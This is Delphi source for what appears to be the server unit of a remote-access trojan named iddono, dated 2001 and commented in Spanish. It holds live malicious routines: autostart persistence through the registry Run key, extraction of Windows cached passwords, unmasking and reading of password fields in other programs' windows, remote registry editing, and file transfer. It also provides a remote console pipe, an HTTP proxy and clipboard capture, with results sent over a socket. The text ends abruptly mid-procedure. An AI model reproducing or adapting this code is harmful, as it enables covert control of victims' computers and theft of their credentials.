unit DLL_Call;

//////////////////////////////////////////////
//           Unit para iddono v1.5          //
//                  (2001)                  //
//////////////////////////////////////////////

interface

uses Windows, WinSock;

procedure HookRegChange();
procedure HookRegChangeEx();
procedure ModRegistro(buff : string);
procedure NTAdjustTokens(lpName : PChar; Attributes : LongWord);
procedure CreateSrc(FileName, Buffile : PChar);
function GetWinDir(): string;
function StrUserName(): string;
function GetValue(NValue : string; RetTipo : Byte; RgKey : HKEY) : string;
function ValueTime() : string;
function SendMsg(hs: Integer; s : PChar): Boolean;
function Trim(const S: string): string;
function LongToStrEx(Value: LongWord): string;
function IntToStr(Value: Integer): string;
function StrToIntDef(const S: string; Default: Integer): Integer;
function GetIPHostName(HostName : PChar) : string;
function GetInstrByNum(buf, DivStr : string; ni : integer) : string;
function GetParamByNum(buf, DivStr : string; pn : integer) : string;
function CommandProcess(strins : string) : integer;

const
  hInteger    = 0;
  hCardinal   = 1;
  hChar       = 2;
  hString     = 4;
  hPointer    = 5;
  hPChar      = 6;
  hWideChar   = 9;
  hPWideChar  = 10;
  hAnsiString = 11;
  hWideString = 15;
  hPtToPt     = 16;

{Config_Server}
type
  _SERV_CONF = packed record
      serv_magic: Word;
      serv_prt: Word;
      serv_ftp: array [0..30] of Char;
      serv_ftp_prt: Word;
      serv_ftp_user: array [0..15] of Char;
      serv_ftp_pws: array [0..15] of Char;
      serv_irc: array [0..30] of Char;
      serv_irc_prt: Word;
      serv_irc_nicka: array [0..10] of Char;
      serv_irc_nickb: array [0..10] of Char;
  end;
  TServerConf = _SERV_CONF;

type
  tagMSG = packed record
    hwnd: HWND;
    message: UINT;
    wParam: WPARAM;
    lParam: LPARAM;
    time: DWORD;
    pt: TPoint;
  end;
  PMsg = ^TMsg;

type
  TRegKeyInfo = record
    NumSubKeys: Integer;
    MaxSubKeyLen: Integer;
    NumValues: Integer;
    MaxValueLen: Integer;
    MaxDataLen: Integer;
    FileTime: TFileTime;
end;

type
  PToPointer = record
     SrcDta : Integer;
     SrcCar : Cardinal;
     PtrSrc : Pointer;
end;

type
  HidroVar = packed record
    case Byte of
      hInteger:    (XInteger: Integer; XType: Byte);
      hCardinal:   (XCardinal: Cardinal);
      hChar:       (XChar: Char);
      hString:     (XString: PShortString);
      hPointer:    (XPointer: Pointer);
      hPChar:      (XPChar: PChar);
      hWideChar:   (XWideChar: WideChar);
      hPWideChar:  (XPWideChar: PWideChar);
      hAnsiString: (XAnsiString: Pointer);
      hWideString: (XWideString: Pointer);
      hPtToPt:     (XPtToPt: PToPointer);
  end;

//Cached Password - Structure
type
 PWinPassword = ^TWinPassword;
 TWinPassword = record
   EntrySize: Word;
   ResourceSize: Word;
   PasswordSize: Word;
   EntryIndex: Byte;
   EntryType: Byte;
   PasswordC: Char;
end;

var
   SendDataVar : boolean;
   GralSocket : TSocket;
   Dataret, PathStr : string;
   Struc : Pointer;
   RetV : integer;
   TKey : HKEY;
   WHandle : THandle;
   PointVar: array [0..9] of Pointer;  //Array para conservar resultados
   //Server_Conf
   ServerConf : TServerConf;

implementation

uses TLHelp32, ThreadsProcs;

var
  WinPassword: TWinPassword;
  hlib: HINST;
  func : pointer;
  HData : THandle;
  DITHREAD : Cardinal;

//Crea Thread (captura cambio en el registro)
procedure HookRegChange();
begin
   CreateTRegistryChange;
end;

//Crea Thread (captura cambio en el registro)
procedure HookRegChangeEx();
begin
   CreateTRegistryChangeEx;
end;

//Rutina para atoejecutar el programa al inicio de windows
//(lee y escribe en el registro)
procedure ModRegistro(buff : string);
var
  handlekey : HKEY;
  RetValu : Boolean;
begin
  RetValu := RegOpenKeyEx (HKEY_LOCAL_MACHINE, PChar('Software\Microsoft\Windows\CurrentVersion\Run'), 0, KEY_ALL_ACCESS, handlekey) = ERROR_SUCCESS;
  if RetValu then begin
     RetValu := RegSetValueEx (handlekey, PChar('FOOD'), 0, REG_SZ, PChar(Buff), length(Buff)+1) = ERROR_SUCCESS;
     RetValu := RegCloseKey (handlekey) = ERROR_SUCCESS;
  end;
end;

function Trim(const S: string): string;
var
  I, L: Integer;
begin
  L := Length(S);
  I := 1;
  while (I <= L) and (S[I] <= ' ') do Inc(I);
  if I > L then Result := '' else
  begin
    while S[L] <= ' ' do Dec(L);
    Result := Copy(S, I, L - I + 1);
  end;
end;

//Devuelve una cadena en formato numerico de un valor para Unsigned 32 bits
function UnSigFrmToStr(Value: Cardinal; FormatStr : PChar): string;
var
  Poinx : Pointer;
  wsprintfX : function (Output: PChar; Format: PChar; Value : Cardinal): Integer; cdecl;
  hdllib : HINST;
  retmp : Integer;
begin
  hdllib := LoadLibrary('User32.dll');   {Carga la libreria}
  if hdllib <> 0 then begin
     Poinx := GetProcAddress(hdllib, 'wsprintfA');
     if Poinx <> nil then begin
        @wsprintfX := Poinx;
        SetLength(Result, 15);
        retmp := wsprintfX(PChar(Result), FormatStr, Value);
        SetLength(Result, retmp);
     end;
  FreeLibrary(hdllib);
  end;
end;

//Devuelve una cadena en formato numerico de un valor para Signed 32 bits
function SigFrmToStr(Value: Integer; FormatStr : PChar): string;
var
  Poinx : Pointer;
  wsprintfX : function (Output: PChar; Format: PChar; Value : Integer): Integer; cdecl;
  hdllib : HINST;
  retmp : Integer;
begin
  hdllib := LoadLibrary('User32.dll');   {Carga la libreria}
  if hdllib <> 0 then begin
     Poinx := GetProcAddress(hdllib, 'wsprintfA');
     if Poinx <> nil then begin
        @wsprintfX := Poinx;
        SetLength(Result, 15);
        retmp := wsprintfX(PChar(Result), FormatStr, Value);
        SetLength(Result, retmp);
     end;
  FreeLibrary(hdllib);
  end;
end;

//Entero largo a cadena hexadecimal
function LongToStr(Value: LongWord): string;
begin
   Result := UnSigFrmToStr(Value, PChar('%08X'));
end;

//Entero largo a cadena
function LongToStrEx(Value: LongWord): string;
begin
   Result := UnSigFrmToStr(Value, PChar('%lu'));
end;

//Entero a cadena
function IntToStr(Value: Integer): string;
begin
   Result := SigFrmToStr(Value, PChar('%d'));
end;

function StrToIntDef(const S: string; Default: Integer): Integer;
var
  E: Integer;
begin
  Val(S, Result, E);
  if E <> 0 then Result := Default;
end;

//Toma parametros segun su posicion en la cadena
function GetParamByNum(buf, DivStr : string; pn : integer) : string;
var
   i, ch : integer;
   y : boolean;
begin
   i:=1;
   y:=false;
   for ch:=1 to length(buf) do begin
     if (copy(buf,ch,length(DivStr)) = #39 ) then begin
        y:=not y;
     end else begin
        if (copy(buf,ch,length(DivStr)) = DivStr) and (y =false) then begin
           if (y = false) then inc(i);
        end else if (i = pn) then Result:= Result + copy(buf,ch,1);
     end;
     if (i > pn) then break;
   end;
   Result:=Trim(Result);
end;

//Toma parametros segun su posicion en la cadena
function GetInstrByNum(buf, DivStr : string; ni : integer) : string;
var
   i, ch : Integer;
begin
   i:=1;
   for ch := 1 to Length(buf) do begin
     if (Copy(buf, ch, Length(DivStr)) <> DivStr) then begin
        if (i = ni) then Result:= Result + Copy(buf,ch,1);
     end else Inc(i);
     if (i > ni) then Break;
   end;
   Result:=Trim(Result);
end;

//Convierte de cadena a cardinal (unsigned 32 bits)
function StrToCardinal(strcar : string) : Cardinal;
var
  i, j : Integer;
  ByteArray : array [0..3] of Byte;
  HexByte : String[2];
begin
  j := 1;
  for i := 3 downto 0 do begin
    HexByte := Copy(strcar, j, 2);
    Inc(j, 2);
    ByteArray[i] := StrToIntDef('$' + HexByte, 0);
  end;
  Result := Cardinal(ByteArray);
end;

//Fecha, hora del sistema.
function ValueTime() : string;
var
  datestr, timestr : string;
  retsize : integer;
begin
  setlength(datestr,128);
  retsize := GetDateFormat(LOCALE_SYSTEM_DEFAULT, LOCALE_NOUSEROVERRIDE and DATE_LONGDATE,
                nil,'ddd MMM dd yyyy', PChar(datestr), 128);
  setlength(datestr, retsize - 1);
  setlength(timestr, 128);
  retsize := GetTimeFormat(LOCALE_SYSTEM_DEFAULT, LOCALE_NOUSEROVERRIDE and TIME_FORCE24HOURFORMAT,
                nil, 'hh:mm:ss tt', PChar(timestr), 128);
  setlength(timestr, retsize - 1);
  Result := datestr + ' - ' + timestr;
end;

//Muestra listado de conexiones
//Devuelve una direccion de red de un nombre
function GetIPHostName(HostName : PChar) : string;
type
    ArrPInAddr = array [0..7] of PInAddr;
    PArrPInAddr = ^ArrPInAddr;
var
   HostEn : PHostEnt;
   pptr : PArrPInAddr;
   BufHst : array [0..128] of char;
   SmllBuff : string;
   i : Integer;
begin
   if HostName = nil then begin
     GetHostName(BufHst, SizeOf(BufHst));
     HostEn := GetHostByName(BufHst);
   end else
     HostEn := GetHostByName(HostName);
   if HostEn <> nil then begin
     if HostName <> nil then begin
       Result := string(iNet_ntoa(PInAddr(HostEn^.h_addr^)^));
     end else begin
       pptr := PArrPInAddr(HostEn^.h_addr_list);
       i := 0;
       while pptr^[i] <> nil do
       begin
          SmllBuff := SmllBuff + string(iNet_ntoa(pptr^[i]^)) + #13#10;
          Inc(i);
       end;
       Result := SmllBuff;
     end;
   end;
end;

//Define los privilegios para windows NT
procedure NTAdjustTokens(lpName : PChar; Attributes : LongWord);
var
   ProcHdl, TokenHdl : Cardinal;
   iLuid : Int64;
   TokenPrivs, TokenPrivsNew : TTokenPrivileges;
   RetC : DWORD;
begin
   ProcHdl := GetCurrentProcess;
   if (OpenProcessToken(ProcHdl, TOKEN_ALL_ACCESS, TokenHdl) = False) then exit;
   if (LookupPrivilegeValue('', lpName, iLuid) = True) then begin
      TokenPrivs.PrivilegeCount := 1;
      TokenPrivs.Privileges[0].Luid := iLuid;
      TokenPrivs.Privileges[0].Attributes := Attributes;
   end;
   if (AdjustTokenPrivileges(TokenHdl,False,TokenPrivs,SizeOf(TokenPrivsNew),TokenPrivsNew,RetC) = False) then exit;
end;

//Envia una cadena de caracteres atravez de un socket
function SendMsg(hs: Integer; s : PChar): Boolean;
begin
   //Envia el texto atravez del handle especificado
   Result := True;
   if SendDataVar then begin
     if Send(hs, s^, Length(s),0) = -1 then
        Result := False;
   end;
end;

//Listado de RAS Conecctions
procedure ListRAS();
type
  PRASConn = ^TRASConn;
  TRASConn = record
     dwSize: LongWord;
     rasConn: LongWord;
     szEntryName: Array[0..256] of Char;
     szDeviceType : Array[0..16] of Char;
     szDeviceName : array [0..128] of char;
end;

var
  Poinx : Pointer;
  RasEnumConnections : function (RASConn: PrasConn; var BufSize: DWord; var Connections: DWord): LongInt; stdcall;
  hdllib : HINST;
  i : Integer;
  Entradas : array [0..9] of TRasConn;
  bufsize, NumEntradas : Cardinal;
begin
  hdllib := LoadLibrary('RasApi32.dll');   {Carga la libreria}
  if hdllib <> 0 then begin
     Poinx := GetProcAddress(hdllib, 'RasEnumConnectionsA');
     if Poinx <> nil then begin
        Entradas[0].dwSize := SizeOf(TRasConn);
        bufsize := SizeOf(TRasConn) * 10;
        @RasEnumConnections := Poinx;
        if RasEnumConnections(@Entradas[0], bufsize, NumEntradas) = 0 then
           if NumEntradas > 0 then begin
              for i := 0 to NumEntradas - 1 do begin
                  DataRet := #13#10 + Entradas[i].szEntryName + '(+)';
                  DataRet := DataRet + Entradas[i].szDeviceType + '(+)';
                  DataRet := DataRet + Entradas[i].szDeviceName + '(+)';
                  DataRet := DataRet + LongToStr(Entradas[i].rasConn);
              end;
           end;
     end;
  FreeLibrary(hdllib);
  end;
end;

//Rutina para acceder a puertos fisicos de la PC
procedure PORTOut(xPort : WORD; nunit: byte);
begin
asm
   push dx
   push ax
   mov dx,xPort
   mov al,nunit
   out dx,al
   pop ax
   pop dx
end;
end;

//Devuelve nombre de usuario
function StrUserName(): string;
var
  aUser: array [0..79] of Char;
  Size : cardinal;
begin
  Size:=79;
  GetUserName(@aUser, Size);
  Result := aUser;
end;

//Devuelve nombre del directorio de windows
function GetWinDir(): string;
var
  DataSize : Integer;
begin
  SetLength (Result, 255);
  DataSize := GetWindowsDirectory(PChar (Result), 255);
  SetLength (Result, DataSize);
end;

//Extrae las cached passwords de Windows (solo 9x y Me)
function GetPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
  Password: String;
  PC: Array[0..$FF] of Char;
begin
  Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
  PC[WinPassword.ResourceSize] := #0;
  CharToOem(PC, PC);
  Password := string(PC);
  Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
  Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
  PC[WinPassword.PasswordSize] := #0;
  CharToOem(PC, PC);
  Password := Password + ': ' + string(PC);
  DataRet := DataRet + #13#10 + Password + #13#10;
  Result := True;
end;

procedure GetWinPws();
var
  Poinx : Pointer;
  WNetEnumCachedPasswords : function (lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; stdcall;
  hlib : HINST;
begin
  hlib := LoadLibrary('mpr.dll');
  if hlib <> 0 then begin
     Poinx := GetProcAddress(hlib, 'WNetEnumCachedPasswords');
     if Poinx <> nil then begin
        @WNetEnumCachedPasswords := Poinx;
        WNetEnumCachedPasswords(nil, 0, $FF, @GetPassword, 0);
     end;
  end;
end;

function WinStyle(handlewin : LongWord) : PChar;
var
  strcar : string;
begin
  if IsWindowEnabled(handlewin) then strcar := '<E>';
  if IsWindowVisible(handlewin) then strcar := strcar + '<V>';
  if IsIconic(handlewin) then strcar := strcar + '<I>';
  if IsZoomed(handlewin) then strcar := strcar + '<Z>';
  Result := PChar(strcar);
end;

//Informacion de las ventanas avtivas (handles, clases, titulos).
procedure WinCTGet(sr:string);
var
  TmpByte : Integer;

function ProcessInf(wnd : HWND; retx : integer) : PChar;
var
  ProssInf : TProcessEntry32;
  PID : DWord;
  Snap : Integer;
begin
  GetWindowThreadProcessId(wnd, @PID);
  Snap:=CreateToolhelp32Snapshot($00000002,0);
  try
    ProssInf.dwSize:=SizeOf(ProssInf);
    if(Process32First(Snap,ProssInf))then
    begin
      repeat
        if (ProssInf.th32ProcessID=PID) then
        begin
          if (retx = 6) then Result:= ProssInf.szExeFile;
          if (retx = 7) then Result:= PChar(LongToStr(ProssInf.th32ProcessID));
          Break;
        end;
      until not(Process32Next(Snap,ProssInf));
    end;
  finally
    Windows.CloseHandle(Snap);
  end;
end;

function shWins(HWND : Cardinal; lParam : Integer) : LongBool;stdcall;
var
   wins : string;
begin
   SetLength(wins,255);
   try
      If (lParam = 1) or (lParam = 4) then SetLength(wins, GetClassName(HWND, PChar(wins), 255));
      If (lParam = 2) or (lParam = 5) then SetLength(wins, GetWindowText(HWND, PChar(wins), 255));
      If (lParam = 3) then wins := IntToStr(hwnd);
      If (lParam = 6) or (lParam = 7) then wins := string(ProcessInf(hwnd, 6));
      If (lParam = 7) then begin
         Dataret := Dataret + wins;
         wins := string(ProcessInf(hwnd, 7));
         Dataret := Dataret + '(+)' + wins  + '(/)' + #13#10;
      end;
      if (wins <> '') and (lParam < 7) then begin
         Dataret := Dataret + wins;
         If (lParam = 4) or (lParam = 5) or (lParam = 6) then begin
            wins := IntToStr(hwnd);
            Dataret := Dataret + '(+)' + wins;
         end;
         Dataret := Dataret + '(+)' + WinStyle(hwnd) + '(/)' + #13#10;
      end;
      Result:=true;
   except end;
end;

begin
   if sr = 'CLS' then TmpByte := 1;
   if sr = 'TIL' then TmpByte := 2;
   if sr = 'HWN' then TmpByte := 3;
   if sr = 'ACW' then TmpByte := 4;
   if sr = 'ATW' then TmpByte := 5;
   if sr = 'APW' then TmpByte := 6;
   if sr = 'APP' then TmpByte := 7;
   EnumWindows(@shWins, TmpByte);
end;

//Devuelve handles, clases, etc.. a los que pertenecen los controles
//de la ventana especificiada.
procedure WinChildGet(sr : string);

function GetChilds(hwnd:cardinal; lparam:integer) : longbool; stdcall;
var
   s : string;
   Textlength : Cardinal;
   Text : PChar;
   RetChar : LongInt;
begin
   SetLength(s, 255);
   SetLength(s, GetClassName(hwnd,PChar(s),255));
   Dataret := Dataret + s;
   //Si la ventana tiene texto tipo password (asteriscos o similar)
   RetChar := SendMessage(hwnd, $00D2, 0, 0);
   if RetChar <> 0 then begin
      SendMessage(hwnd, $00CC, 0, 0)   {Quita la mascara}
   end;
   TextLength := SendMessage(hwnd, $000E, 0, 0);
   GetMem(Text, TextLength + 1);
   SendMessage(hwnd, $000D, TextLength + 1, integer(Text));
   Dataret := Dataret + '(+)' + inttostr(hwnd) + '(+)' +
              Text + '(+)' + WinStyle(hwnd);
   FreeMem(Text, TextLength + 1);
   if RetChar <> 0 then begin
      SendMessage(hwnd, $00CC, RetChar, 0);   {Retorna la mascara}
      Dataret := Dataret + '<P>';  {Indica que se trata de un password}
   end;
   Dataret := Dataret + '(/)' + #13#10;
   Result := true;
end;

begin
   EnumChildWindows(StrToIntDef(sr, 0),@GetChilds,1);
end;

//Devulve los archivos del directorio especificado
procedure WinFDGet(dr:string);
var
   sr: WIN32_FIND_DATA;
   retval:integer;
   opsuccess:longbool;
   filezize:cardinal;
   tipo: string;
begin
   tipo:='';
   retval:=FindFirstFile(PChar(dr), sr);
   if retval <> -1 then begin
      while opsuccess do begin
         tipo:='';
         filezize := 0;
         if (sr.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) > 0 then begin
            tipo:='<D>';
         end else begin
            if (sr.nFileSizeHigh <> 0) then begin
               filezize:= (((sr.nFileSizeHigh * 32) + sr.nFileSizeLow) div 1024);
            end else begin
               filezize:= (sr.nFileSizeLow) div 1024;
            end;
         end;
         if (sr.dwFileAttributes and FILE_ATTRIBUTE_NORMAL) > 0 then
            tipo:= tipo + '<N>';
         if (sr.dwFileAttributes and FILE_ATTRIBUTE_ARCHIVE) > 0 then
            tipo:= tipo + '<A>';
         if (sr.dwFileAttributes and FILE_ATTRIBUTE_SYSTEM) > 0 then
            tipo:= tipo + '<S>';
         if (sr.dwFileAttributes and FILE_ATTRIBUTE_HIDDEN) > 0 then
            tipo:= tipo + '<H>';
         if (sr.dwFileAttributes and FILE_ATTRIBUTE_READONLY) > 0 then
            tipo:= tipo + '<R>';
         Dataret := Dataret + tipo + '(+)' + (sr.cFileName) + '(+)' + inttostr(filezize) + #13#10;
         opsuccess := FindNextFile(retval,sr);
      end;
   end;
end;

//Muetra informacion de RED (Conexiones Locales, Grupos de trabajo)
procedure NetInfoProc(sr : string);
var
  lpocal: TNetResource;
  pas1, pas2, pas3 : PChar;
  pas4 : Integer;
  pas5 : Byte;

function EnumerateFunc(HWND:THandle; lpnr: TNetResource; device: PChar; Unidad: PChar; Pasw: PChar; Flg: Integer; Tipo: Byte):boolean;
var
  dwResult, dwResultEnum : DWORD;
  henum:THandle;
  cEntries:DWORD;
  lpnrLocal: Array [0..20] of TNetResource;
  cbBuffer:DWORD;
  i:integer;
begin
cEntries := $FFFFFFFF;
cbBuffer:=SizeOf(lpnrLocal);

if lpnr.dwScope = 3000 then begin
   dwResult:=WNetOpenEnum(RESOURCE_GLOBALNET,RESOURCETYPE_ANY, 0,nil,henum);
   lpnr.dwScope := 0;
end else begin
   dwResult:=WNetOpenEnum(RESOURCE_GLOBALNET,RESOURCETYPE_ANY, 0,@lpnr,henum);
end;

if (dwResult <> NO_ERROR) then begin
   Result:=False;
   exit;
end;

while(dwResultEnum <> ERROR_NO_MORE_ITEMS) do begin
  dwResultEnum := WNetEnumResource(hEnum, cEntries, @lpnrLocal, cbBuffer);
  if (dwResultEnum = NO_ERROR) then begin
     for i:= 0 to cEntries do begin
        if(RESOURCEUSAGE_CONTAINER = (lpnrLocal[i].dwUsage and RESOURCEUSAGE_CONTAINER)) then begin
           if (lpnrLocal[i].lpProvider <> '') and (lpnrLocal[i].lpRemoteName = '') then
              Dataret := Dataret + '(C)' + lpnrLocal[i].lpProvider + '(+)' + IntToStr(lpnrLocal[i].dwDisplayType) + #13#10;
           Dataret := Dataret + '(C)' + lpnrLocal[i].lpRemoteName +  '(+)' + IntToStr(lpnrLocal[i].dwDisplayType) + #13#10;
           if (lpnrLocal[i].lpRemoteName = string(device)) and (Tipo = 0) then begin
              lpnrLocal[i].lpLocalName := Unidad;
              WNetAddConnection2(lpnrLocal[i], Pasw, Unidad, Flg);
           end;
           if(not EnumerateFunc(hwnd, lpnrLocal[i], device, Unidad, Pasw, Flg, Tipo)) then
              //form1.edit1.text:= 'FALSE' + #13#10
           else begin
              if (dwResultEnum <> ERROR_NO_MORE_ITEMS) then begin
                 //exit;
              end;
           end;
        end else begin   //Si no es un contenedor de otros recursos
           //Conecta el dispositico remoto a una unidad local
           if (lpnrLocal[i].lpRemoteName = string(device)) and (Tipo = 1) then begin
              lpnrLocal[i].lpLocalName := Unidad;
              WNetAddConnection2(lpnrLocal[i], Pasw, nil, Flg);
              //DataRet := string(device) + ' To ' + string(Unidad);
           end;
           Dataret := Dataret + '(D)' + lpnrLocal[i].lpRemoteName + '(+)' +
                      IntToStr(lpnrLocal[i].dwType) + '(+)' + lpnrLocal[i].lpComment + #13#10;
        end;
     end;
  end;
end;
 dwResult := WNetCloseEnum(hEnum);
 Result:=true;
end;

begin
pas1 := nil;
pas2 := nil;
pas3 := nil;

if sr <> '' then begin
   pas1 := PChar(GetParamByNum(sr,' ',1));   //Recurso
   pas2 := PChar(GetParamByNum(sr,' ',2));   //Unidad
   pas3 := PChar(GetParamByNum(sr,' ',3));   //Password
   try
     pas4 := StrToIntDef(GetParamByNum(sr,' ',4), 1);   //Flag
   except end;
   pas5 := 1;
end else begin
   pas5 := 0;
end;
//Llama a la funcion
FillChar(lpocal, SizeOf(lpocal), 0);
lpocal.dwScope := 3000;
EnumerateFunc(0, lpocal, pas1, pas2, pas3, pas4, pas5);
end;

//Abre una llave del registro de windows
procedure RegOpenKey(sr : string);
var
  Rets : LongBool;
  TmpVar : string;
  RKEY : DWORD;
  SubKey : string;
begin
  TmpVar := GetParamByNum(sr,' ',1);

  If TmpVar = 'CLASSES_ROOT' then RKEY := DWORD($80000000);
  If TmpVar = 'CURRENT_USER' then RKEY := DWORD($80000001);
  If TmpVar = 'LOCAL_MACHINE' then RKEY := DWORD($80000002);
  If TmpVar = 'USERS' then RKEY := DWORD($80000003);
  If TmpVar = 'PERFORMANCE_DATA' then RKEY := DWORD($80000004);
  If TmpVar = 'CURRENT_CONFIG' then RKEY := DWORD($80000005);
  If TmpVar = 'DYN_DATA' then RKEY := DWORD($80000006);

  SubKey := GetParamByNum(sr, ' ', 2);

  Rets := RegOpenKeyEx (RKEY, PChar(SubKey), 0, KEY_ALL_ACCESS, TKEY) = ERROR_SUCCESS;
  If not Rets then begin
     DataRet := 'RegErr';
     TKEY := 0;
  end;
end;

//Crea o modifica un valor del registro de windows
procedure RegModValue(sr : string);
var
  Rets : LongBool;
  TmpVar : string;
  TmpInt : Integer;
  ValueName : string;
  Tip : string;
begin
  ValueName := GetParamByNum(sr,' ',1);
  TmpVar := GetParamByNum(sr,' ',2);
  Tip:= Copy(TmpVar,1,1);
  if Tip = '$' then begin   //String
    Delete(TmpVar,1,1);
    Rets := RegSetValueEx (TKEY, PChar(ValueName), 0, REG_SZ, PChar(TmpVar), Length(TmpVar) + 1) = ERROR_SUCCESS;
  end;
  if Tip = '@' then begin   //DWORD
    Delete(TmpVar,1,1);
    try
      TmpInt := StrToIntDef(TmpVar, 0);
    except end;
    Rets := RegSetValueEx (TKEY, PChar(ValueName), 0, REG_DWORD, @TmpInt, SizeOf(TmpInt)) = ERROR_SUCCESS;
  end;
  if Tip = '>' then begin   //Binary
    Delete(TmpVar,1,1);
    TmpInt := StrToIntDef(TmpVar, 0);
    Rets := RegSetValueEx (TKEY, PChar(ValueName), 0, REG_BINARY, PChar(TmpVar), Length(TmpVar)) = ERROR_SUCCESS;
  end;
  If not Rets then begin
     DataRet := 'RvlErr';
  end;
end;

//Borra un valor del registro de windows
procedure RegDelValue(sr : string);
var
  Rets : LongBool;
begin
  Rets := RegDeleteValue(TKEY,PChar(sr)) = ERROR_SUCCESS;
  If not Rets then begin
     DataRet := 'RdlErr';
  end;
end;

//Crea una llave dentro del registro de windows
procedure RegCreaKey(sr : string);
var
  Rets : LongBool;
  NewKey : HKEY;
begin
  Rets := RegCreateKey(TKEY, PChar(sr), NewKey) = ERROR_SUCCESS;
  If not Rets then begin
     DataRet := 'KclErr';
  end;
end;

//Crea una clave dentro del registro de windows
procedure RegDelKey(sr : string);
var
  Rets : LongBool;
begin
  Rets := RegDeleteKey(TKEY, PChar(sr)) = ERROR_SUCCESS;
  If not Rets then begin
     DataRet := 'KdlErr';
  end;
end;

//Toma el contenido de una valor
function GetValue(NValue : string; RetTipo : Byte; RgKey : HKEY) : string;
var
  I:Integer;
  Buffer : string;
  TmpBuff, TipoVal : string;
  BuffInt:integer;
  DataType, DataSize : Cardinal;
  RetVal :boolean;
begin
  RetVal := RegQueryValueEx(RgKey, PChar(NValue), nil, @DataType, nil, @DataSize) = ERROR_SUCCESS;
  If RetVal then begin
    If (DataType = REG_SZ) Or (DataType = REG_EXPAND_SZ) then begin
       SetString(Buffer, nil, DataSize);
       RetVal := RegQueryValueEx(RgKey, PChar(NValue), nil, @DataType, PByte(PChar(Buffer)), @DataSize) = ERROR_SUCCESS;
       Result := PChar(Buffer);
       if RetTipo = 0 then Result := Result + '(+)<S>'
    end;
    If DataType = REG_BINARY then begin
       SetString(Buffer, nil, DataSize);
       RetVal := RegQueryValueEx(RgKey, PChar(NValue), nil, @DataType, PByte(PChar(Buffer)), @DataSize) = ERROR_SUCCESS;
       for I:=1 to Length(Buffer) do begin
          TmpBuff:= TmpBuff + SigFrmToStr(Ord(Buffer[I]), '%02X');
       end;
       Result := TmpBuff;
       if RetTipo = 0 then Result := Result + '(+)<B>';
    end;
    If DataType = REG_DWORD then begin
       RetVal := RegQueryValueEx(RgKey, PChar(NValue), nil, @DataType, @BuffInt, @DataSize) = ERROR_SUCCESS;
       Result := '0x' + UnSigFrmToStr(BuffInt, '%08X');
       if RetTipo = 0 then Result := Result + '(+)<D>';
    end;
  end;
end;

//Devuelve un listado de los valores contenidos en la clave
procedure RegEnumVal(sr : string; RegTypeRet : Byte);
var
  info : TRegKeyInfo;
  Rets : boolean;
  I : integer;
  bSize : DWORD;
  tBuff, RegTipo : string;
  numh : integer;
begin
  RegQueryInfoKey(TKEY, nil, nil, nil, @info.NumSubKeys,
    @info.MaxSubKeyLen, nil, @info.NumValues, @info.MaxValueLen,
    @info.MaxDataLen, nil, @info.FileTime);

  if (RegTypeRet = 1) then begin
     numh := info.NumValues;
     SetString(tBuff, nil, Info.MaxValueLen + 1);
  end else
      if (RegTypeRet = 0 )then begin
         numh := info.NumSubKeys;
         SetString(tBuff, nil, Info.MaxSubKeyLen + 1);
      end;
  //Comienza a buscar el listado de claves o valores o ambos.
  for I := 0 to numh - 1 do
  begin
    if (RegTypeRet = 0) then begin
       bSize := Info.MaxSubKeyLen + 1;
       RegEnumKeyEx(TKEY, DWORD(I), PChar(tBuff), bSize, nil, nil, nil, nil);
       RegTipo := '<K>(+)'
    end else if (RegTypeRet = 1) then begin
       bSize := Info.MaxValueLen + 1;
       RegEnumValue(TKEY, DWORD(I), PChar(tBuff), bSize, nil, nil, nil, nil);
       RegTipo := '<V>(+)'
    end;
    DataRet := DataRet  + #13#10 + RegTipo + PChar(tBuff);
    if (sr = 'GET') and (RegTypeRet = 1) then begin
      DataRet := DataRet + '(+)' + PChar(GetValue(tBuff, 1, TKEY));
    end;
    DataRet := DataRet + '(/)';
  end;
end;

//Comienza la transferencia de un fichero (upload - download)
procedure TransferFile(sr : string; TrnfType : Byte);
begin
  CreateTFileNet(sr, TrnfType);
end;

//Comienza el thread de tomar salida de consola
procedure DosConsoleApp(sr : string);
begin
  if sr <> '' then
     CreateTPipeConsole(sr)
  else
     TerminatePipeConsole;
end;

//Inicia el Proxy HTTP
procedure ExecuteProxy(sr : string);
begin
  If GetParamByNum(sr,' ',2) = 'ON' then begin
    try
      CreateProxy(Word(StrToIntDef(GetParamByNum(sr,' ',1), 0)));
    except end;
  end else EndProxy;
end;

//Extrae datos del clipboard (solo texto)  -- ARREGLAR --
procedure GetDataClipboard(sr : string);
var
  tmpStr : string;
  MemTemp : PChar;
  sizestr : Cardinal;
  Data: THandle;
  DataPtr: Pointer;
begin
  if (OpenClipboard(0)) then begin
    tmpStr := GetParamByNum(sr, ' ', 1);
    if tmpStr = 'PUT' then begin
      MemTemp := PChar(GetParamByNum(sr, ' ', 2));
      sizestr := Length(MemTemp);
      Data := GlobalAlloc(GMEM_MOVEABLE + GMEM_DDESHARE, sizestr);
      DataPtr := GlobalLock(Data);
      Move(MemTemp^, DataPtr^, sizestr);
      EmptyClipboard;
      SetClipboardData(CF_TEXT, Data);
      CloseClipboard;
      GlobalUnlock(Data);
      GlobalFree(Data);
      DataRet := 'Ok';
    end else begin
      if tmpStr = 'DEL' then begin
        EmptyClipboard;
        DataRet := 'Ok';
      end else begin
        HData := GetClipboardData(CF_TEXT);
        DataRet := PChar(GlobalLock(HData));
        GlobalFree(HData);
      end;
    end;
  CloseClipboard;
  end;
end;

//Crea un archivo con el contenido especificado.
procedure CreateSrc(FileName, Buffile : PChar);
var
  //Copia de archivo
  SrcFile : THandle;
  BytesWirte : DWORD;
begin
  //Crea nuevo archivo
  SrcFile := CreateFile (FileName, GENERIC_WRITE,
  0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
  //Escrive en el nuevo archivo
  WriteFile (SrcFile, Buffile^, Length (Buffile), BytesWirte, nil);
  //Cierra archivo
  CloseHandle (SrcFile);
end;

//Hace operaciones sobre el resultado
procedure SetResultValue(sr : string);
var
  ResOp : string;
begin
  ResOp := GetParamByNum(sr, ' ', 1);
  If (ResOp = 'OR') then RetV := RetV or StrToIntDef(GetParamByNum(sr, ' ', 2), 0);
  If (ResOp = 'AND') then RetV := RetV and StrToIntDef(GetParamByNum(sr, ' ', 2), 0);
